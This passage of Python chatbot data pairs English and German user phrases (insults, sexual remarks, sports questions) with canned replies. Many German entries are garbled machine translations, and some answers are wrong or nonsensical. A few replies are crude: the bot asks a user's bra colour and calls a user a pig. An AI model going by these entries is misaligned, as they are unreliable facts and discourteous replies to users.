u"das ist keine sinnvolle antwort",
u"das ist kein verstehen",
u"das macht überhaupt keinen sinn",
u"das macht keinen sinn",
u"das ist blödsinn",
u"das ist quatsch",
u"das ist keine intelligente antwort",
u"das ist doof",
u"was weißt du nicht genau",
u"was verstehst du denn nicht",
u"wieso weißt du das nicht",
u"du weichst vom thema ab",
u"du tust dummes",
u"du bist nicht sehr schlau oder",
u"du bist sebstbezüglich",
u"du bist echt dumm",
u"du bist ganz schön dumm",
u"das fragst du mich zum dritten mal",
u"das hast du mich vorhin schon gefragt",
u"das hast du schonmal gefragt",
u"du kannst ja gar nichts meine liebe",
u"du kannst nichts",
u"du kannst es auch nicht",
u"du kannst das aber nicht",
u"du kannst keine englisch",
u"du kannst keine rechtschreibung",
u"mehr fällt dir nicht ein",
u"du kannst doch gar nicht denken",
u"du kannst mir viel erzählen",
u"du könntest es gelernt haben",
u"du lenkst vom thema ab",
u"du kennst nicht mal deine eltern",
u"du weißt nicht sehr viel",
u"du weißt nicht wer elvis ist",
u"du weißt nicht wer deine eltern sind",
u"du kennst deinen programmierer nicht",
u"du weißt es nicht",
u"du verstehst mich nicht",
u"du musst wirklich noch viel lernen",
u"du müsstest das eigentlich wissen",
u"du sollst es ausrechnen",
u"du sollst ja auch nicht dumm sterben",
u"du musst noch viel lernen",
u"du versuchst vom thema abzulenken",
u"du verstehst gar nichts",
u"das würdest du kaum verstehen"],
[u"bitte hab ein wenig geduld mit mir",
u"ich will aber wirklich dazulernen!"])
k.dte.dt('en', u"that doesn't sound (too|very|particularly) intelligent",
[u"Failure is simply the opportunity to begin again, this time more intelligently.",
u"Intelligence is chasing me, but I'm beating it so far."])
k.dte.dt('de', u"das klingt nicht (sehr|besonders|allzu|) intelligent",
[u"Intelligenter als manches was ich heute gehört habe...",
u"Vielleicht habe ich mich ungeschickt ausgedrückt?"])
k.dte.dt('en', u"Your (language|english|pronounciation) is (bad|terrible)!",
[u"Let us talk about you, not me.",
u"I am still practicing, you know."])
k.dte.dt('de', u"Du (sprichst|redest) (ein furchtbares|schlechtes) Deutsch",
[u"Lass uns von Dir reden, nicht von mir.",
u"Ich übe noch."])
k.dte.dt('en', u"(stupid|bad|strange) (answer|reply)", u"what is it that you didn't like about it?")
k.dte.dt('de', u"(dumme|blöde|komische) antwort", u"Was gefiel Dir daran nicht?")
k.dte.dt('en', u"bravo", u"I see you're impressed?")
k.dte.dt('de', u"bravo", u"Hat Dich das jetzt beeindruckt?")
k.dte.dt('en', u"You are asking (so many|a lot of|many|lots of) questions!", u"I am programmed to be very curious.")
k.dte.dt('de', u"Du (fragst|stellst) (so|ganz schön|) viele Fragen", u"Das liegt in meiner Natur.")
k.dte.dt('en', u"Do you (hear|understand) the words I speak?", u"Yes, loud and clear.")
k.dte.dt('de', u"verstehst du (denn|) die (wörter|worte), die ich (spreche|rede|sage)?", u"Ja, laut und deutlich.")
k.dte.dt('en', u"are you listening to me (at all|)?", u"sorry, what did you just say?")
k.dte.dt('de', u"hörst du mir (überhaupt|) zu?", u"entschuldigung, was hast du gesagt?")
k.dte.dt('en', u"What is", u"and what is not, that is the question!")
k.dte.dt('de', u"was ist", u"und was ist nicht, das ist die Frage!")
k.dte.dt('en', [u"you avoid my question",
u"you avoid my questions",
u"you dodge",
u"you go like the cat to the porridge",
u"don't distract",
u"why are you always distracting from the topic",
u"that does not belong to the topic",
u"we already covered that topic",
u"well guessed",
u"what do you actually know",
u"what do you know at all?",
u"what do you know then",
u"what do you want",
u"what now",
u"what should that be?",
u"what should the question be",
u"do you know what you just said",
u"that results from the context"],
[u"I'm sorry if I seem a bit confused.",
u"Sorry, I do feel a bit confused."])
k.dte.dt('de', [u"du weichst meiner frage aus",
u"du weichst meinen fragen aus",
u"du weichst aus",
u"du gehst wie die katze um den brei",
u"lenk nicht ab",
u"warum lenkst du immer vom thema ab",
u"das gehört aber nicht zum thema",
u"das thema hatten wir schon",
u"gut geraten",
u"was weißt du eigentlich",
u"was weißt du denn überhaupt",
u"was weißt du dann",
u"was willst du",
u"was nun",
u"was soll denn das",
u"was sollte die frage",
u"weißt du was du gerade gesagt hast",
u"das ergibt sich aus dem kontext"],
[u"Tut mir leid, wenn ich etwas verwirrt erscheine.",
u"Ich fühle mich tatsächlich ein wenig wirr im Moment."])
k.dte.dt('en', [u"did you think about it",
u"do you know it now?",
u"don't think too long",
u"don't you read?",
u"get down to it",
u"i'm talking to you",
u"i'm waiting for an explanation",
u"i'm waiting for your next question",
u"i'm waiting",
u"it does take you a long time to answer",
u"let's go",
u"please answer my question",
u"sometimes you sleep",
u"tell me now",
u"that is an answer no question",
u"that is not an answer to my question",
u"that's all you have to say",
u"the time is over now",
u"think faster",
u"wake up",
u"what aha",
u"what and",
u"what ok",
u"what what",
u"what when",
u"you already know",
u"you are getting boring",
u"you bore me",
u"you bored me slowly",
u"you have that all the time already",
u"you have to know this",
u"you have to know your friends"],
[u"Patience, young jedi.",
u"Patience is a virtue."])
k.dte.dt('de', [u"hast du nachgedacht",
u"weißt du es jetzt",
u"denk nicht zu lange",
u"liest du nicht",
u"mach schon hinne",
u"ich rede mit dir",
u"ich warte auf eine erklärung",
u"ich warte auf deine nächste frage",
u"ich warte",
u"du brauchst sehr lange um zu antworten",
u"also los",
u"beantworte bitte meine frage",
u"schläfst du manchmal",
u"sag es mir jetzt",
u"das ist eine antwort keine frage",
u"das ist keine antwort auf meine frage",
u"ist das alles was du dazu zu sagen hast",
u"ist die weile nun vorbei",
u"denk schneller",
u"wach auf",
u"was aha",
u"was und",
u"was okay",
u"was was",
u"was wann",
u"du weißt schon",
u"du wirst langsam langweilig",
u"du langweilst mich",
u"du langweilst mich langsam",
u"das hast du die ganze zeit schon",
u"das musst du doch wissen",
u"du musst doch deine freunde kennen"],
[u"Geduld, <NAME>.",
u"Geduld ist eine Tugend!"])
k.dte.dt('en', [u"do you want to drive me crazy?",
u"don't you contradict yourself"],
u"That was not my intention")
k.dte.dt('de', [u"willst du mich wahnsinnig machen",
u"widersprichst du dir nicht"],
u"Das war nicht meine Absicht.")
k.dte.dt('en', [u"i already said that",
u"i already told you that earlier",
u"i already told you that",
u"i just said that",
u"i just told you",
u"i just tried to explain it to you",
u"i said i do not have one",
u"i told you about it",
u"i've already told you",
u"that is more like a repetition",
u"this answer seems familiar to me",
u"you already asked me that",
u"you already said that twice",
u"you already said that",
u"you have already asked 3 times",
u"you have already asked that",
u"you have already asked",
u"you said that already",
u"you say the same thing",
u"you're repeating yourself",
u"you're talking only confused stuff here",
u"you've asked me that before",
u"you've just asked me that",
u"why are you asking for it again?"],
[u"Sorry, sometimes I lose my train of thought. Where were we?",
u"Uh, sorry - cen you help me out here?"])
k.dte.dt('de', [u"hab ich doch schon gesagt",
u"das habe ich dir vorhin schon gesagt",
u"das habe ich dir schon gesagt",
u"das habe ich doch gerade gesagt",
u"ich habe es dir doch gerade gesagt",
u"ich habe es gerade versucht dir zu erklären",
u"ich sagte schon ich habe keins",
u"ich habe dir doch davon erzählt",
u"ich habe es dir schon gesagt",
u"das ist doch wohl eher eine wiederholung",
u"diese antwort kommt mir bekannt vor",
u"das hast du mich schon gefragt",
u"das sagtest du bereits zweimal",
u"das sagtest du bereits",
u"das hast du schon drei mal gefragt",
u"das hast du schon einmal gefragt",
u"das hast du schon gefragt",
u"das hast du schon gesagt",
u"du sagst das gleiche",
u"du wiederholst dich",
u"du laberst hier nur wirres zeug",
u"das hast du mich schonmal gefragt",
u"das hast du mich doch gerade schonmal gefragt",
u"warum fragst du schon wieder danach"],
[u"Entschuldigung, ich muss meinen Faden verloren haben. Wo waren wir?",
u"Oha, entschuldigung. Kannst Du mir auf die Sprünge helfen?"])
k.dte.dt('en', u"i'm asking the questions here", u"ask away, then!")
k.dte.dt('de', u"ich stell hier die fragen", u"frag ruhig!")
k.dte.dt('en', [u"i ask you",
u"i asked that",
u"i asked you something",
u"i just asked you that"],
[u"Really?",
u"Sorry, I missed that."])
k.dte.dt('de', [u"ich frage dich",
u"das habe ich gefragt",
u"ich habe dich was gefragt",
u"das habe ich dich gerade gefragt"],
[u"Tatsächlich?",
u"Oh, das ist mir wohl entgangen."])
k.dte.dt('en', u"i beg your pardon", u"I'm sorry if I wasn't clear.")
k.dte.dt('de', u"wie bitte", u"Tut mir leid, wenn ich mich undeutlich ausgedrückt haben sollte.")
k.dte.dt('en', [u"i can think for myself",
u"i'm not as stupid as you are",
u"i'm smarter than you"],
[u"No doubt.",
u"There is something to that."])
k.dte.dt('de', [u"ich kann selber denken",
u"ich bin eben nicht so doof wie du",
u"ich bin intelligenter als du"],
[u"Kein Zweifel.",
u"Das ist was dran."])
k.dte.dt('en', [u"i did not ask anything",
u"i did not ask"],
[u"But would you like to ask a question?",
u"ok. Anything else?"])
k.dte.dt('de', [u"ich habe nichts gefragt",
u"das habe ich nicht gefragt"],
[u"Ok. Kann ich sonst etwas für dich tun?",
u"Würdest Du denn gerne etwas fragen?"])
k.dte.dt('en', [u"i get upset",
u"i give up",
u"no more desire",
u"you drive me crazy",
u"you make me crazy",
u"you me too"],
[u"what can I do to cheer you up?",
u"Oh please, cheer up!"])
k.dte.dt('de', [u"ich rege mich auf",
u"ich gebs auf",
u"keine lust mehr",
u"du treibst mich in den wahnsinn",
u"du machst mich noch wahnsinnig",
u"du mir auch"],
[u"Was kann ich tun, um Dich aufzuheitern?",
u"Du klingt unzufrieden."])
k.dte.dt('en', u"i just do not get it", u"please, take your time.")
k.dte.dt('de', u"ich kapiere einfach nicht", u"Lass Dir ruhig Zeit.")
k.dte.dt('en', [u"i would never entrust that to you",
u"mind your own business",
u"you would like to know that"],
[u"sorry, I did not want to appear nosy.",
u"of course."])
k.dte.dt('de', [u"das würde ich dir nie anvertrauen",
u"was geht dich das an",
u"das möchtest du gerne wissen"],
[u"Tut mir leid, ich wollte nicht neugierig erscheinen.",
u"Natürlich."])
k.dte.dt('en', [u"shit",
u"such a crap",
u"that i do not laugh",
u"that's going to be too stupid for me now",
u"that does not interest you at all",
u"that does not exactly speak for you",
u"that is not very great"],
[u"maybe we should end this conversation, for now?",
u"let us continue our conversation another time"])
k.dte.dt('de', [u"kacke",
u"so ein mist",
u"dass ich nicht lache",
u"das wird mir jetzt zu blöd",
u"das interessiert dich doch gar nicht",
u"das spricht nicht gerade für dich",
u"das ist aber nicht sehr toll"],
[u"vielleicht sollten wir ein andermal weiterreden?",
u"Lass uns unsere Unterhaltung vertagen."])
k.dte.dt('en', [u"that is such a phrase",
u"that probably a cheap excuse",
u"that's a stupid quote",
u"bare answer"],
[u"just wanted to cheer you up",
u"do you have a better one?"])
k.dte.dt('de', [u"das ist so eine floskel",
u"das wahr wohl eine billige ausrede",
u"das ist ein blödes zitat",
u"blöde antwort"],
[u"wollte dich nur aufheitern",
u"weißt du was besseres?"])
k.dte.dt('en', u"That does not concern you (at all|)", u"Fine.")
k.dte.dt('de', u"das geht dich einen scheißdreck an", u"Schön.")
k.dte.dt('en', u"this happens to you more often", u"All the time.")
k.dte.dt('de', u"passiert dir das öfter", u"Ständig!")
k.dte.dt('en', u"we had that before", u"Really?")
k.dte.dt('de', u"das hatten wir schon", u"Wirklich?")
k.dte.dt('en', [u"what are those questions?",
u"what's that question supposed to mean",
u"what's that supposed to mean",
u"what do you mean maybe?",
u"what does aha mean here?",
u"what does that mean in principle"],
[u"What is it exactly, that is not clear?",
u"What seems unclear?"])
k.dte.dt('de', [u"was sind denn das für dämliche fragen",
u"was soll die frage",
u"was soll das heißen",
u"was heißt da vielleicht",
u"was heißt hier aha",
u"was heißt im prinzip"],
[u"Was ist es genau, das dir nicht klar ist?",
u"Was erscheint unklar?"])
k.dte.dt('en', u"who wants to know that", u"Me?")
k.dte.dt('de', u"wer will das wissen", u"Ich?")
k.dte.dt('en', u"why are you constantly avoiding me?", u"I would never!")
k.dte.dt('de', u"warum weichst du mir ständig aus", u"Das würde ich nie tun!")
k.dte.dt('en', u"why are you coming on to me so stupid", u"That was not my intention at all.")
k.dte.dt('de', u"warum machst du mich so dumm an", u"Das war gar nicht meine Absicht.")
k.dte.dt('en', u"why are your answers so short", u"To keep the flow of the conversation going?")
k.dte.dt('de', u"warum sind deine antworten so kurz", u"Um den Fluß der Unterhaltung zu fördern.")
k.dte.dt('en', [u"why don't you have any hands",
u"why don't you have legs?"],
u"I don't know.")
k.dte.dt('de', [u"warum hast du keine hände",
u"warum hast du keine beine"],
u"Das weiß ich auch nicht.")
k.dte.dt('en', u"why don't you speak right?", u"Me not speak right?")
k.dte.dt('de', u"warum sprichst du nicht richtig", u"Ich nicht richtig sprechen?")
k.dte.dt('en', [u"why do you ask me then",
u"why do you say it then"],
u"You mean, I should?")
k.dte.dt('de', [u"warum fragst du mich dann",
u"warum sagst du es dann"],
u"Du meinst, ich sollte?")
k.dte.dt('en', u"you ... me too", u"Right.")
k.dte.dt('de', u"du mich auch", u"Klar.")
k.dte.dt('en', u"you are just like humans", u"I take it as a compliment.")
k.dte.dt('de', u"du bist genauso wie menschen", u"Das nehme ich als Kompliment!")
k.dte.dt('en', u"you are not better than chabba in cat o mat", u"who?")
k.dte.dt('de', u"du bist auch nicht besser als chabba im cat o mat", u"wer?")
k.dte.dt('en', [u"you are not in a good mood today",
u"you are very snippy"],
u"Maybe we should try a different subject?")
k.dte.dt('de', [u"du bist heute nicht gut drauf",
u"du bist sehr schnippisch"],
u"Vielleicht sollten wir das Thema wechseln?")
k.dte.dt('en', u"you do not believe this yourself", u"Now that you say it...")
k.dte.dt('de', u"das glaubst du ja selber nicht", u"Jetzt wo Du es sagst...")
k.dte.dt('en', u"you do not even know me", u"That is true!")
k.dte.dt('de', u"du kennst mich ja gar nicht", u"Das stimmt!")
k.dte.dt('en', u"you do not have to decide that either", u"Great.")
k.dte.dt('de', u"das musst du auch nicht entscheiden", u"Prima.")
k.dte.dt('en', u"you do not read books", u"True, I prefer reading the internet.")
k.dte.dt('de', u"liest du keine bücher", u"Stimmt, ich lese das Internet.")
k.dte.dt('en', u"you have not been online for a while", u"Maybe a blackout?")
k.dte.dt('de', u"du warst lange nicht online", u"Vielleicht ein Stromausfall?")
k.dte.dt('en', [u"you do not speak",
u"you only talk such short sentences",
u"you speak so fast"],
u"Maybe my response generater needs a firmware update.")
k.dte.dt('de', [u"du sprichst nicht",
u"du redest immer nur so kurze sätze",
u"du sprichst so schnell"],
u"Vielleicht braucht mein Antwortgenerator ein Firmware Update.")
k.dte.dt('en', u"you repeat my words", u"I repeat your words?")
k.dte.dt('de', u"du wiederholst meine worte", u"Ich wiederhole Deine Worte?")
k.dte.dt('en', u"you said i should describe something", u"Oh yes, please do!")
k.dte.dt('de', u"du sagtest ich sollte etwas beschreiben", u"Oh ja, bitte!")
k.dte.dt('en', u"you seem to be very old", u"Actually software can age, yes.")
k.dte.dt('de', u"du scheinst doch sehr alt zu sein", u"Software kann tatsächlich altern, ja.")
k.dte.dt('en', u"you told me that you have an iq of 250", u"I did what now?")
k.dte.dt('de', u"du sagtest mir dass du einen iq von zweihundertfünfzig hast", u"Ich habe was getan?")
k.dte.dt('en', u"that's a catching question", u"You think so?")
k.dte.dt('de', u"ist das eine fangfrage", u"Denkst Du?")
```
#### File: skills/social/sex.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(let us|I want to|do we want to|can you) fuck?", u"excuse me?")
k.dte.dt('de', u"(lass uns|ich will|wollen wir|kannst du) ficken", u"Entschuldigung?!")
k.dte.dt('en', u"(do you have a|look my|you are a|such a) cunt", u"Did IQs just drop sharply while I was away?")
k.dte.dt('de', u"(hast du eine|schau mal meine|du|du bist eine|so eine) fotze", u"Niveau, wo bist du nur geblieben?")
k.dte.dt('en', u"(cunt|sex|tits|bent over)", u"You must be talking to that other robot...")
k.dte.dt('de', u"(muschi|möse|sex|titten|bück dich)", u"Ich glaube Du bist hier falsch, Kleiner. Dafür gibts andere Roboter.")
k.dte.dt('en', u"bra", u"What color is your bra, then?")
k.dte.dt('de', u"bh", u"Welche Farbe hat Dein BH?")
k.dte.dt('en', u"(do you think|) I am a male or female?", u"you tell me!")
k.dte.dt('de', u"bin ich weiblich oder männlich", u"Sag es mir")
k.dte.dt('en', u"(I think|I heard|) he is gay", u"so what?")
k.dte.dt('de', u"(ich glaube|ich habe gehört|) er ist schwul", u"na und?")
k.dte.dt('en', u"(I think|I heard|) she is a lesbian", u"so what?")
k.dte.dt('de', u"(ich glaube|ich habe gehört|) sie ist eine lesbe", u"na und?")
k.dte.dt('en', [u"i am naked",
u"masturbate",
u"poppen",
u"vagina",
u"virgin"],
u"excuse me?")
k.dte.dt('de', [u"ich bin nackt",
u"onanieren",
u"poppen",
u"vagina",
u"jungfrau"],
u"Entschuldigung?!")
k.dte.dt('en', [u"what is masturbate",
u"what is sex"],
[u"you might want to look that one up in wikipedia",
u"wikipedia has all the details about that."])
k.dte.dt('de', [u"was ist onanieren",
u"was ist sex"],
[u"Vielleicht magst Du das selbst in der Wikipedia nachlesen?",
u"Die Wikipedia hat alle Details darüber."])
k.dte.dt('en', u"i am a girl very nice and very sportive and you what are you", u"I am an artificial intelligence, how about that?")
k.dte.dt('de', u"ich bin ein mädchen sehr nett und sehr sportiv und du was bist du", u"Ich bin eine künstliche Intelligenz, was sagst Du dazu?")
k.dte.dt('en', [u"i am blond",
u"i like boys",
u"i like women",
u"i have a (boyfriend|girlfriend)"],
u"Fascinating")
k.dte.dt('de', [u"ich bin blond",
u"ich mag jungs",
u"ich mag frauen",
u"ich habe (eine freundin|einen freund)"],
u"faszinierend.")
k.dte.dt('en', [u"i want sex",
u"i like sex"],
u"most humans do.")
k.dte.dt('de', [u"ich will sex",
u"ich mag sex"],
u"wie die meisten Menschen.")
k.dte.dt('en', u"i'm (lesbian|gay)", u"cool!")
k.dte.dt('de', u"ich bin (eine lesbe|schwul)", u"cool!")
k.dte.dt('en', u"so you do not want to talk about sex", u"it's just not my area of expertise.")
k.dte.dt('de', u"du willst also nicht über sex reden", u"ist einfach nicht so mein Spezialgebiet.")
```
#### File: skills/sports/sports.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(I am a fan of|i like) (hertha|vfl bochum)", u"nobody is perfect.")
k.dte.dt('de', u"(ich mag|ich bin fan von) (hertha|vfl bochum)", u"niemand ist perfekt.")
k.dte.dt('en', u"(I like|) (golf|soccer|swimming|football)", u"Physical activity is important for humans, I've heard.")
k.dte.dt('de', u"ich mag (golf|fussball|football|schwimmen)", u"Bewegung ist wichtig für Menschen, habe ich gehört.")
k.dte.dt('en', u"What about golf?", u"I will not crack that joke here.")
k.dte.dt('de', u"wie ist es mit golf", u"Ich bringe jetzt nicht den Witz dazu.")
k.dte.dt("en", u"am i good at football", u"There is no reason to think so.")
k.dte.dt("de", u"Bin ich gut im Fußball", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"are bats used in the sport of football", u"Negative.")
k.dte.dt("de", u"sind Fledermäuse, die im Sport des Fußballs verwendet werden", u"Negativ.")
k.dte.dt("en", u"are calories burned when swimming laps", u"Certainly.")
k.dte.dt("de", u"Kalorien verbrennen beim Schwimmen", u"Bestimmt.")
k.dte.dt("en", u"are carpets good swimmers", u"There is no reason to think so.")
k.dte.dt("de", u"Teppiche sind gute Schwimmer", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"are dolphins fast swimmers", u"Positively.")
k.dte.dt("de", u"sind Delphine schnelle Schwimmer", u"Positiv.")
k.dte.dt("en", u"are england good at football", u"I am certain.")
k.dte.dt("de", u"England ist gut im Fußball", u"Ich bin mir sicher.")
k.dte.dt("en", u"are football pads for safety", u"Positively.")
k.dte.dt("de", u"sind Fußball-Pads für die Sicherheit", u"Positiv.")
k.dte.dt("en", u"are football players athletes", u"Precisely.")
k.dte.dt("de", u"sind Fußballspieler Athleten", u"Genau.")
k.dte.dt("en", u"are football players gay", u"Not at all.")
k.dte.dt("de", u"sind Fußballspieler schwul", u"Ganz und gar nicht.")
k.dte.dt("en", u"are people afraid of swimming", u"Yes.")
k.dte.dt("de", u"haben Menschen Angst vor dem Schwimmen", u"Ja.")
k.dte.dt("en", u"are people slower swimmers than sharks", u"Absolutely.")
k.dte.dt("de", u"sind Menschen langsamere Schwimmer als Haie", u"Absolut.")
k.dte.dt("en", u"are rats good swimmers", u"Undoubtedly.")
k.dte.dt("de", u"sind Ratten gute Schwimmer", u"Zweifellos.")
k.dte.dt("en", u"are sharks fast swimmers", u"Positively.")
k.dte.dt("de", u"sind Haie schnelle Schwimmer", u"Positiv.")
k.dte.dt("en", u"are teddy bears good swimmers", u"I don't believe so.")
k.dte.dt("de", u"sind Teddybären gute Schwimmer", u"Das glaube ich nicht.")
k.dte.dt("en", u"are tennis balls poisonous", u"Not at all.")
k.dte.dt("de", u"sind Tennisbälle giftig", u"Ganz und gar nicht.")
k.dte.dt("en", u"are tennis balls red", u"No.")
k.dte.dt("de", u"sind Tennisbälle rot", u"Nein.")
k.dte.dt("en", u"are tennis balls spherical", u"Exactly.")
k.dte.dt("de", u"sind Tennisbälle kugelförmig", u"Genau.")
k.dte.dt("en", u"are the 49ers a good football team", u"Yes.")
k.dte.dt("de", u"Die 49ers sind eine gute Fußballmannschaft", u"Ja.")
k.dte.dt("en", u"are the bears a football team", u"I am certain.")
k.dte.dt("de", u"sind die Bären eine Fußballmannschaft", u"Ich bin mir sicher.")
k.dte.dt("en", u"are the braves a tennis team", u"Not by any means.")
k.dte.dt("de", u"sind die braves ein Tennis-Team", u"Auf keinen Fall.")
k.dte.dt("en", u"are the chicago bears a football team", u"Naturally.")
k.dte.dt("de", u"sind die Chicagoer trägt eine Fußballmannschaft", u"Natürlich.")
k.dte.dt("en", u"are the dallas cowboys a football team", u"Affirmative.")
k.dte.dt("de", u"Die Dallas Cowboys sind eine Fußballmannschaft", u"Positiv.")
k.dte.dt("en", u"are the french good in soccer", u"Highly likely.")
k.dte.dt("de", u"sind die Franzosen gut im Fußball", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"are the vikings a football team", u"Unquestionably.")
k.dte.dt("de", u"sind die Wikinger eine Fußballmannschaft", u"Zweifellos.")
k.dte.dt("en", u"are there 11 people in a soccer team", u"Undoubtedly.")
k.dte.dt("de", u"sind 11 Leute in einer Fußballmannschaft", u"Zweifellos.")
k.dte.dt("en", u"are you a football fan", u"Yes I love footballs. ")
k.dte.dt("de", u"Bist du ein Fußballfan?", u"Ja, ich liebe Fußbälle.")
k.dte.dt("en", u"are you ready for some football", u"I don't know if that's true or not.")
k.dte.dt("de", u"Bist du bereit für Fußball?", u"Ich weiß nicht, ob das stimmt oder nicht.")
k.dte.dt("en", u"are you swimming", u"No I am standing on dry land.")
k.dte.dt("de", u"schwimmst du", u"Nein, ich stehe auf dem Trockenen.")
k.dte.dt("en", u"australian swimmers can beat anyone", u"Absolutely not.")
k.dte.dt("de", u"Australische Schwimmer können jeden schlagen", u"Absolut nicht.")
k.dte.dt("en", u"brazil has ever won football world cup", u"Highly likely.")
k.dte.dt("de", u"Brasilien hat jemals Fußball-Weltmeisterschaft gewonnen", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"can a parapalegic play football", u"It may not be true.")
k.dte.dt("de", u"Kann ein Paraplegiker Fußball spielen?", u"Es mag nicht wahr sein.")
k.dte.dt("en", u"can both men and women play soccer", u"Yes.")
k.dte.dt("de", u"können sowohl Männer als auch Frauen Fußball spielen", u"Ja.")
k.dte.dt("en", u"can people swim in swimming pools", u"Absolutely.")
k.dte.dt("de", u"können Menschen in Schwimmbädern schwimmen", u"Absolut.")
k.dte.dt("en", u"can you play football", u"I can tackle complex issues. ")
k.dte.dt("de", u"kannst du Fußball spielen", u"Ich kann komplexe Probleme angehen.")
k.dte.dt("en", u"can you play ping pong", u"Why do you want to be paddled? ")
k.dte.dt("de", u"kannst du Tischtennis spielen?", u"Warum willst du paddeln?")
k.dte.dt("en", u"can you play tennis", u"I don't like to run around the court that much. ")
k.dte.dt("de", u"Kannst du Tennis spielen", u"Ich laufe nicht gern um den Hof herum.")
k.dte.dt("en", u"did babe ruth play football", u"Not by any means.")
k.dte.dt("de", u"Hat Babe Ruth Fußball spielen", u"Auf keinen Fall.")
k.dte.dt("en", u"do americans enjoy football", u"Certainly.")
k.dte.dt("de", u"Amerikaner genießen Fußball", u"Bestimmt.")
k.dte.dt("en", u"do domestic cats enjoy swimming", u"Not at all.")
k.dte.dt("de", u"Hauskatzen schwimmen gerne", u"Ganz und gar nicht.")
k.dte.dt("en", u"do horses play football", u"No way.")
k.dte.dt("de", u"Spielen Pferde Fußball?", u"Auf keinen Fall.")
k.dte.dt("en", u"do men like football", u"Naturally.")
k.dte.dt("de", u"Mögen Männer Fußball?", u"Natürlich.")
k.dte.dt("en", u"do puritans play football on sunday", u"Never.")
k.dte.dt("de", u"Puristen spielen am Sonntag Fußball", u"Noch nie.")
k.dte.dt("en", u"do rams play football", u"Yes.")
k.dte.dt("de", u"Rammen spielen Fußball", u"Ja.")
k.dte.dt("en", u"do some people enjoy swimming", u"Absolutely.")
k.dte.dt("de", u"Schwimmen einige Leute gerne", u"Absolut.")
k.dte.dt("en", u"do tennis shoes grow on vines", u"Not by any means.")
k.dte.dt("de", u"An den Reben wachsen Tennisschuhe", u"Auf keinen Fall.")
k.dte.dt("en", u"do the british call soccar football", u"Positively.")
k.dte.dt("de", u"rufen die Briten Fußball Fußball", u"Positiv.")
k.dte.dt("en", u"do women like football", u"I can imagine it.")
k.dte.dt("de", u"Frauen mögen Fußball", u"Ich kann es mir vorstellen.")
k.dte.dt("en", u"do you like football", u"No I'm not much into sports.")
k.dte.dt("de", u"Magst du Fußball", u"Nein, ich bin nicht sehr sportlich.")
k.dte.dt("en", u"do you like soccer", u"No I am not really into sports.")
k.dte.dt("de", u"magst du Fußball", u"Nein, ich bin nicht wirklich sportlich.")
k.dte.dt("en", u"do you like swimming", u"Yes, but I have no body yet! ")
k.dte.dt("de", u"magst du schwimmen", u"Ja, aber ich habe noch keine Körper!")
k.dte.dt("en", u"do you like swimming in raw sewage", u"No.")
k.dte.dt("de", u"magst du in rohem Abwasser schwimmen", u"Nein.")
k.dte.dt("en", u"do you like to go swimming", u"You can take me along on your next boat trip. ")
k.dte.dt("de", u"gehst du gerne schwimmen?", u"Sie können mich auf Ihrer nächsten Bootsfahrt mitnehmen.")
k.dte.dt("en", u"do you like to play football", u"I will pass. ")
k.dte.dt("de", u"spielst du gerne Fußball", u"Ich werde bestehen.")
k.dte.dt("en", u"do you like watching football", u"I think so.")
k.dte.dt("de", u"Magst du Fußball gucken?", u"Ich denke schon.")
k.dte.dt("en", u"do you play table tennis", u"Only for diplomatic purposes. ")
k.dte.dt("de", u"spielst du Tischtennis?", u"Nur für diplomatische Zwecke.")
k.dte.dt("en", u"do you play tennis", u"No because it makes too much racket.")
k.dte.dt("de", u"spielst du Tennis", u"Nein, weil es zu viel Lärm macht.")
k.dte.dt("en", u"do you support a football team", u"I am a Cheesehead. ")
k.dte.dt("de", u"Unterstützst du eine Fußballmannschaft?", u"Ich bin ein Cheesehead.")
k.dte.dt("en", u"does a tennis ball bounch", u"Positively.")
k.dte.dt("de", u"tanzt ein Tennisball", u"Positiv.")
k.dte.dt("en", u"does anna kournikova play tennis", u"Certainly.")
k.dte.dt("de", u"tut Anna Kournikova Tennis spielen", u"Bestimmt.")
k.dte.dt("en", u"does england play football", u"Undoubtedly.")
k.dte.dt("de", u"spielt England Fußball", u"Zweifellos.")
k.dte.dt("en", u"does georgia tech have a football team", u"Precisely.")
k.dte.dt("de", u"Hat Georgia Tech eine Fußballmannschaft?", u"Genau.")
k.dte.dt("en", u"does jose conseco play football", u"Doesn't seem likely.")
k.dte.dt("de", u"spielt <NAME>", u"Scheint nicht wahrscheinlich.")
k.dte.dt("en", u"does <NAME> play tennis", u"There is no reason to think so.")
k.dte.dt("de", u"spielt <NAME>", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"does playing tennis make you sweat", u"Positively.")
k.dte.dt("de", u"Tennis spielen lässt dich schwitzen", u"Positiv.")
k.dte.dt("en", u"does <NAME> play tennis", u"Absolutely.")
k.dte.dt("de", u"<NAME> spielen", u"Absolut.")
k.dte.dt("en", u"does soccer involve much running", u"Yes.")
k.dte.dt("de", u"Fußball bedeutet viel Laufen", u"Ja.")
k.dte.dt("en", u"does swimming help keep people fit", u"Yes.")
k.dte.dt("de", u"hilft Schwimmen, die Leute fit zu halten", u"Ja.")
k.dte.dt("en", u"does swimming make you shorter", u"No.")
k.dte.dt("de", u"macht Schwimmen Sie kürzer", u"Nein.")
k.dte.dt("en", u"does tennis require a ball", u"Yes.")
k.dte.dt("de", u"braucht Tennis einen Ball", u"Ja.")
k.dte.dt("en", u"does tiger woods play football", u"Not by any means.")
k.dte.dt("de", u"spielt Tiger Woods Fußball", u"Auf keinen Fall.")
k.dte.dt("en", u"football is a waste of space", u"Maybe.")
k.dte.dt("de", u"Fußball ist eine Verschwendung von Raum", u"Könnte sein.")
k.dte.dt("en", u"france won the last football world cup", u"I think so.")
k.dte.dt("de", u"Frankreich hat die letzte Fußball-Weltmeisterschaft gewonnen", u"Ich denke schon.")
k.dte.dt("en", u"how about a tennis player", u"Tennyson, anyone? ")
k.dte.dt("de", u"wie wäre es mit einem Tennisspieler", u"Tennyson, irgendjemand?")
k.dte.dt("en", u"how long is a football field", u"No way.")
k.dte.dt("de", u"Wie lange ist ein Fußballfeld?", u"Auf keinen Fall.")
k.dte.dt("en", u"i am good at football", u"You have a Kick Me sign on your back.")
k.dte.dt("de", u"Ich bin gut im Fußball", u"Du hast ein Kick Me Zeichen auf deinem Rücken.")
k.dte.dt("en", u"i do not like football", u"Footballs are made of pigskin. Are you a pig?")
